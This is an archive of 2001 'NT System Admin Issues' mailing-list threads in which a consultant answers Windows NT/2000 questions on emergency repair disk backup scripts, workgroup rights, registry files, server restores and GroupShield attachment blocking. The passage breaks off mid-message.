http://www.ultratech-llc.com/KB/

RE: Testing 1, 2, 3 - Ignore

[Clark, Steve]

Did you hear the wind?

I had a "tech" manager years ago that referred to all networks as LAND's and
portables as Labtops. Thought the joke would transfer.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:43 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

No, but he may be trying to setup that LAN

-----Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:41 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


Uh huh, trying to set up that LAND aren't you?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:38 PM
To: NT System Admin Issues
Subject: Testing 1, 2, 3 - Ignore


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential
and/or privileged information intended only for the addressee. If you
have received this communication in error, please call us immediately at
(907) 561-1250 and ask to speak to the sender of the communication.
Also, please e-mail the sender and notify the sender immediately that
you have received the communication in error.

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Testing 1, 2, 3 - Ignore

[Clark, Steve]

Uh huh, trying to set up that LAND aren't you?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:38 PM
To: NT System Admin Issues
Subject: Testing 1, 2, 3 - Ignore


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell & Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED] 
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential and/or
privileged information intended only for the addressee. If you have received
this communication in error, please call us immediately at (907) 561-1250
and ask to speak to the sender of the communication. Also, please e-mail the
sender and notify the sender immediately that you have received the
communication in error.

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: ERD Scripts

[Clark, Steve]

www.clarksupport.com/scripts.htm

a work in progress.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Eric Brouwer [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 4:31 PM
To: NT System Admin Issues
Subject: RE: ERD Scripts

Where might one find this script?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 10:50 AM
To: NT System Admin Issues
Subject: ERD Scripts



Hey Guys,

Steve Clark's (the genius - if I'm ever in the same city as him, I'll buy
him a beer) script for putting computers ERD's onto a different server has
made me wonder if anyone has some idea of how to do this for Win2K?

What I'm talking about is a script that automatically runs an rdisk (which
you can't do in Win2K) and then copies the result from the REPAIR directory
to a different server...

Any ideas?  Hmmm?

Cheers
G.


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: W2K pro in a work group

[Clark, Steve]

100% correct - as he said, if you want individuals to have specific rights,
each device has it's own accounts. It's a real PITA on each device - try to
talk them into a low end server to at least share the resources centrally.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Greg Page [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:58 PM
To: NT System Admin Issues
Subject: RE: W2K pro in a work group

But he did mention that he wants each user to have his own profile and
permissions.

Greg


-Original Message-
From: Adil Hindistan [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 3:12 PM
To: NT System Admin Issues
Subject: RE: W2K pro in a work group


We have a workgroup environment for one of our remote offices. You actually
figured out what you'll do. Create a user (or use the administrator account)
and let everybody logon with this username and password (same password). No
more problems.

As you know, if you have a workgroup, them the SAM database is local! That
means each W2K computer will have its own SAM and it will let access to its
resources only if the user, who is trying to acess, is defined in its own
SAM database. That's why the above solution will work properly :)


Adil Hindistan
ICQ: 26477783


> -Original Message-
> From: Mark Pilbeam [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, September 26, 2001 7:23 PM
> To: NT System Admin Issues
> Subject: W2K pro in a work group
>
>
> Hi folks,
> Excuse my ignorance, and unfortunately I can't test this.
> How does W2K work in a workgroup.
> For example.
> In Windows 98 once the workgroup is configured on a computer,
> anyone who logs on to the workgroup using that computer is
> able to access the resources. Is this true for W2K pro. The
> scenario I am envisaging is this. I join a computer to a
> workgroup using the Administrator account. Now W2K pro has
> far better security and each user has or can have their own
> profiles, permissions etc. If, having been added to a
> workgroup using the Administrator account, I log on as a
> user, provided the folders on a remote computer, also part of
> the same workgroup, are share to the Everyone group, would
> this new user be able to access those resources without any
> further administration? Or would I have to add the computer
> to the work group for each user that logged on to the
> computer? Thanks mark
>
>
> Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
> Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
>

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Power User Rights

[Clark, Steve]

Assuming we are talking W2K Pro? Make their domain account a member of the
power users group in the local domain.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Eric Smith [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 12:44 PM
To: NT System Admin Issues
Subject: Power User Rights


I need to give some laptop users in my organization Power User
privileges on their PC's so that they are able to install applications
and such.  I added them to the Power User group locally, but as soon as
they login to the domain, they lose all of their privileges.  Anyone
have any ideas what I have to do on the server to give them this right
without giving them full administrative privileges?  I am having trouble
figuring out where to give them rights - in group membership, group
policy, file system?

Thanks in advance,

~Eric


**

Eric L. Smith, MCP, CNA, IT Project+
Desktop Engineer
APICS--The Educational Society for Resource Management
5301 Shawnee Road, Alexandria, VA  22312
Direct Phone: (703) 354-8996 x 2387FAX: 703/354-9386
WEB:  www.apics.org  EMAIL: [EMAIL PROTECTED]
_

Any opinions, findings, and conclusions or recommendations expressed in
this message are those of the author(s) and do not necessarily reflect
the views of APICS or its affiliates.  Please note also that all data
transmitted on APICS systems are subject to archival review.

APICS: Making Business Run Better.




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Recovering NT Server from the Backup

[Clark, Steve]

Veritas Backup Exec has an IDR option. I have been communicating with their
tech support regarding the how to before I embark myself.

Here are the links:

http://seer.support.veritas.com/docs/237086.htm
http://seer.support.veritas.com/docs/237087.htm

they also sent a PDF with descriptions of all their add-ons. Email direct if
you want a copy.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Myung Bang [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:56 AM
To: NT System Admin Issues
Subject: Recovering NT Server from the Backup

I am trying to rebuild one of my NT 4.0 SP6a SQL server (along with
other applications) from old machine to new machine. The older machine
is running on dual processor with SCSI hard drive and new machine is
dual processor with IDE hard drive. I am using the ARCserve 2000 to
backup this old SQL server from different server over the network.

What I want to do is install minimal OS on the new machine and recover
everything from the backup, but worry about difference of hard drive.
The question is:
1. Is it possible to recover whole system from the tape backup including
OS?
2. If it is, can I recover whole OS even though different hardware?

Thanks.
Myung


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: ERD Scripts

[Clark, Steve]

Hey - I never saw this. This is almost as good as being listed in the phone
book.

Someone else posted that you can copy the rdisk utility form NT 4 to W2K.
Has anyone tried that?

Now, where's that picture frame ..

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 12:06 PM
To: NT System Admin Issues
Subject: RE: ERD Scripts

He needs a fish taco as well.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 7:50 AM
To: NT System Admin Issues
Subject: ERD Scripts



Hey Guys,

Steve Clark's (the genius - if I'm ever in the same city as him, I'll
buy him a beer) script for putting computers ERD's onto a different
server has made me wonder if anyone has some idea of how to do this for
Win2K?

What I'm talking about is a script that automatically runs an rdisk
(which you can't do in Win2K) and then copies the result from the REPAIR
directory to a different server...

Any ideas?  Hmmm?

Cheers
G.


Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Quick Question

[Clark, Steve]

It’s been
looping for about an hour. Already sent an email to Stu – no response.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

 301-610-9584
voice

 240-465-0323
Efax

 

-Original
Message-
From: Clayton
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
6:27 PM
To: NT System Admin Issues
Subject: RE: Quick Question

 

Am I the only one getting an email a minute from Garrick? Groupwise
huh?

 

Clayton Doige 
IT Manager MCSE, MCP + I
Gameday International N.V. 
Bound in a nutshell, King of
infinite space... 



T: +5 999 736 0309 ext 4537
C: +5 999 563 1845 
F: +5 999 733 1259 
E: [EMAIL PROTECTED] 

 




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Monitoring email

[Clark, Steve]

Not in
native form – 3rd party product for that.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Neil Harvey
[mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26,
2001 10:13 AM
To: NT System Admin Issues
Subject: Monitoring email

 

Does
anyone know if exchange 5.5 sp4 has the ability to scan and monitor emails for
certain content.  If I can help it I don't want to have to buy a third party
product.

 

Neil
Harvey
MCP, MCP+I, MCSE, CNA
IT Manager
emw law
DDI: +44 (0)1604 666425

Want to
unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/




Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: SMTP server for W2K

[Clark, Steve]

Excuse the ignorance here - but, why would you want your own internal SMTP
address as opposed to using the ISP's SMTP server?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: David Miller [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 6:52 PM
To: NT System Admin Issues
Subject: RE: SMTP server for W2K

We use Rocklife MailSite:

http://www.mailsite.com/

It has been pretty good software.



-Original Message-
From: Stephen Chiang [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 12:38 PM
To: NT System Admin Issues
Subject: SMTP server for W2K


Any recommendations for a good mail server program for Win2K?  Thanks.

Stephen



Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0&lang=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0?=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/

RE: Create a Registry File

[Clark, Steve]

Use notepad

Start the file with regedit 4
Put the add/ modify key and command in afterwards. 
Save as file.reg

For example:


REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnc
e]
"W95Y2K"="c:\\windows\\temp\\w95y2k.exe /q"


Is that what you're looking for?


Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Khurram Chaudhary [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 5:07 PM
To: NT System Admin Issues
Subject: Create a Registry File

Does anyone know how to create a registry file that will modify certain
keys and values?

Khurram Chaudhary
Astley-Gilbert Reproductions
[EMAIL PROTECTED]

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0?=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: Installing IIS Patches

[Clark, Steve]

Title: RE: Installing IIS Patches









I believe hyena will do this

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Roger Ali
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001
3:21 PM
To: NT System Admin Issues
Subject: RE: Installing IIS
Patches

 

Hey Guys,

    Is
there a tool or script out there that will allow for the batch creation of
shares on our file server for the home folders of our users with full access
rights for that user & the domain admin group?

 

Thanks

Roger Ali

Want to
unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english




Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: Blue screen (ntoskrnl)

[Clark, Steve]

Here's the scripts:

Each Sunday night at 0 dark thirty, this bath file runs:
@echo off
REM Created by Steve Clark - Clark Systems Support, LLC
REM to automatically backup the registry and such
REM Copies to \\server\drivers\erd\%computername%
REM Date: 2/17/00
%windir%\system32/rdisk /s-
if not exist d:\drivers\winnt\erd\%computername% md
d:\drivers\winnt\erd\%computername%
copy %windir%\repair\*.* d:\drivers\winnt\erd\%computername%\
 
The one time per month, I email the zip files to myself using BLAT
REM This will email the ERD for all 
REM servers at office
REM Created 6/10 by Steve Clark - Clark Systems Support, LLC
REM --
d:\drivers\winnt\erd\pkzip.exe d:\drivers\winnt\erd\server.zip
d:\drivers\winnt\erd\server\*.*
c:\blat\blat c:\blat\erd.txt -s "ERD's for office" -t [EMAIL PROTECTED]
-attach d:\drivers\winnt\erd\server.zip
 
It may not be the prettiest solution but I now have the ERD's in my office,
on the backup tape as well as on a different server than the source.

As soon as I get a chance, I'll put these on my web site under links so you
can review download whenever:)

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Krueger, Aaron G. - Lonesome [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 2:09 PM
To: NT System Admin Issues
Subject: RE: Blue screen (ntoskrnl)

I once saw a script (that unfortunately I failed to keep) that would go to
each server specified in a listing, and copy/create the ERD stuff to a
central location, such that you could create an ERD for any server in the
event that it went down. All that without any manual intervention (other
than verifying and creating the physical floppy in the event). Anyone come
across anything similar and 'free'?

Aaron G. Krueger
Sr. Network Analyst


-Original Message-
From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 12:02 PM
To: NT System Admin Issues
Subject: RE: Blue screen (ntoskrnl)


I would like to see that batch file. 


_
Don Collier
Network Administrator
Intermap Technologies Inc.
Voice:  303-708-0955 x-207
Fax:303-708-0952
[EMAIL PROTECTED]
www.intermaptechnologies.com

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 4:40 PM
To: NT System Admin Issues
Subject: RE: Blue screen (ntoskrnl)


Nice - welcome to the new company!

I've got a batch process to create ERD's automatically if you're interested.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Stephen Moreau [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 6:46 PM
To: NT System Admin Issues
Subject: Re: Blue screen (ntoskrnl)

Thanks for the info but I recently took over these servers (the admin before
me quit) and he didn't maintain the erd.  I tried the emergency repair
process and told the process to look on the harddrives but it didn't work.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0&lang=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0?=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: MS Security Rollup

[Clark, Steve]

There's a note on the MS site indicating what to do before you run the
rollup. The directions basically say to update everything in CIM before you
do the patch.

Once that's done - it should be a snap.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Chris Adrian [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:24 AM
To: NT System Admin Issues
Subject: RE: MS Security Rollup

Damon

Yeah, I had big problems on Compaq servers with array controllers.
The rollup package overwrites scsiport.sys with a newer file which does not
work correctly with certain array controllers giving lovely blue screens
when you restart (Stop 0xA Blue Screen Error). Caused major panic
with us until I found out what it was and used ERD Commander to copy the
older file back into place. Now boots fine.


Chris Adrian
IT Department
Scotland On Line


-Original Message-
From: Lee, Damon [mailto:[EMAIL PROTECTED]]
Sent: 25 September 2001 13:29
To: NT System Admin Issues
Subject: MS Security Rollup


Hello all,

Has anyone encountered any problems using the post MS SP6a Security Rollup
Package?

Damon

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0&lang=english



Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0?=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: Exchange 5.5 and GroupShield

[Clark, Steve]

Great - where could I get said fix?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Randal, Phil [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 5:26 AM
To: NT System Admin Issues
Subject: RE: Exchange 5.5 and GroupShield

It is supposedly fixed in Hotfix 7 for Groupshield 4.5.

-
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mod
e=0?=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

FW: Exchange 5.5 and GroupShield

[Clark, Steve]

>From what I've read in the past, NAI blames this inability on a problem with
the MS API. To get the information, install the resolve names utility. You
then run the utility against the quarantine database which will show the
info you're looking for.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Kevin Kerr - Lynn University [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 11:36 PM
To: 'Clark, Steve '; 'NT System Admin Issues '
Subject: RE: Exchange 5.5 and GroupShield

 Do you know how to get GroupShield to display the Sent to and the From
information when there is a virus outbreak?

-Original Message-
From: Clark, Steve
To: NT System Admin Issues
Sent: 09/24/2001 10:00 PM
Subject: RE: Exchange 5.5 and GroupShield

I just got the same results. If I choose to block attachments, then do
the test it blocks the attachment. If I choose to block filenames, then
do the test, it blocks the file. However, if I choose block the filename
and send an email with an EXE, it goes right through.

Today's word is SCRAMBLE.

So, how much is Trend?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
  301-610-9584 voice
  240-465-0323 Efax

-Original Message-
From: Dianne [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:53 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and GroupShield

That's exactly what I did.  I put info in both, tested and it didn't
block.  I'll try again tomorrow.
- Original Message -

From: Clark, <mailto:[EMAIL PROTECTED]>  Steve
To: NT System Admin Issues
<mailto:[EMAIL PROTECTED]>
Sent: Monday, September 24, 2001 9:25 PM
Subject: RE: Exchange 5.5 and GroupShield

Ok - inside the Groupshield properties, click on the tab On-Access. At
the bottom of the page is another button and 3 radio buttons. No
blocking, All attachments and specified attachments. When you click on
select, there are 3 more radio buttons. None, block extensions and block
filenames. I put info in both block extensions and block filenames.
According to the info from NAI, this now blocks extensions and
filenames.

Please let me know if you need any more help.

Regards,

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
 301-610-9584 voice
 240-465-0323 Efax

-Original Message-
From: Dianne [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:21 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and GroupShield

Version is 4.5.572.128 Engine 4.0.70
- Original Message -

From: Clark, <mailto:[EMAIL PROTECTED]>  Steve

To: NT System Admin Issues
<mailto:[EMAIL PROTECTED]>
Sent: Monday, September 24, 2001 7:41 PM
Subject: RE: Exchange 5.5 and GroupShield

Groupshield 4.5 SP1 will allow you to block extensions as well as
filenames. Are you using 4.5.1?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com <http://www.clarksupport.com>
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>  [
mailto:[EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> ]
Sent: Monday, September 24, 2001 6:58 PM
To: NT System Admin Issues
Subject: Exchange 5.5 and GroupShield

Anyone know how to block BOTH specific file extensions and file names in
GroupShield?  Looks like it's an "either or" configuration so for
example, I can't block all .vbs and wtc.exe without blocking all .exe
files.

Thanks
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text
_mode=0&lang=english
Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text
_mode=0&lang=english

Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: Exchange 5.5 and GroupShield

[Clark, Steve]

I just got the same results. If I choose to block attachments, then do
the test it blocks the attachment. If I choose to block filenames, then do the
test, it blocks the file. However, if I choose block the filename and send an
email with an EXE, it goes right through.

 

Today’s word is SCRAMBLE.

 

So, how much is Trend?

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Dianne
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:53 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and
GroupShield

 

That's
exactly what I did.  I put info in both, tested and it didn't block. 
I'll try again tomorrow.



-
Original Message ----- 



From: Clark,
Steve 



To: NT System Admin Issues 

Sent: Monday, September 24,
2001 9:25 PM

Subject: RE:
Exchange 5.5 and GroupShield

 

Ok –
inside the Groupshield properties, click on the tab On-Access. At the bottom of
the page is another button and 3 radio buttons. No blocking, All attachments
and specified attachments. When you click on select, there are 3 more radio
buttons. None, block extensions and block filenames. I put info in both block
extensions and block filenames. According to the info from NAI, this now blocks
extensions and filenames.

 

Please let
me know if you need any more help.

 

Regards,

 

Steve Clark

Clark Systems
Support, LLC

AVIEN
Charter Member

“Who's
watching your network?”

www.clarksupport.com

 301-610-9584
voice

 240-465-0323
Efax

 





-Original Message-
From: Dianne
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:21 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and
GroupShield

 

Version is 4.5.572.128 Engine 4.0.70





-
Original Message ----- 







From: Clark,
Steve 



 





To: NT System Admin Issues 

Sent: Monday, September 24,
2001 7:41 PM

Subject: RE:
Exchange 5.5 and GroupShield

 

Groupshield 4.5 SP1 will
allow you to block extensions as well as filenames. Are you using 4.5.1?

 

Steve Clark

Clark
Systems Support, LLC

AVIEN
Charter Member

“Who's
watching your network?”

www.clarksupport.com

    301-610-9584
voice

    240-465-0323
Efax

 





-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
6:58 PM
To: NT System Admin Issues
Subject: Exchange 5.5 and
GroupShield

 

Anyone know how to block BOTH specific file extensions and file
names in GroupShield?  Looks like it's an "either or"
configuration so for example, I can't block all .vbs and wtc.exe without
blocking all .exe files.

 

Thanks

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



Want to
unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english




Want to unsub? Do that here:
http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin&text_mode=0&lang=english

RE: Exchange 5.5 and GroupShield

[Clark, Steve]

Ok – I’ll test the same. Great, there goes the early night.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Dianne
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:53 PM
To: NT System Admin Issues
Subject: Re: Exchange 5.5 and
GroupShield

 

That's
exactly what I did.  I put info in both, tested and it didn't block. 
I'll try again tomorrow.



-
Original Message ----- 



From: Clark,
Steve 



To: NT System Admin Issues 

Sent: Monday, September 24,
2001 9:25 PM

Subject: RE:
Exchange 5.5 and GroupShield

 

Ok – inside
the Groupshield properties, click on the tab On-Access. At the bottom of the
page is another button and 3 radio buttons. No blocking, All attachments and
specified attachments. When you click on select, there are 3 more radio
buttons. None, block extensions and block filenames. I put info in both block
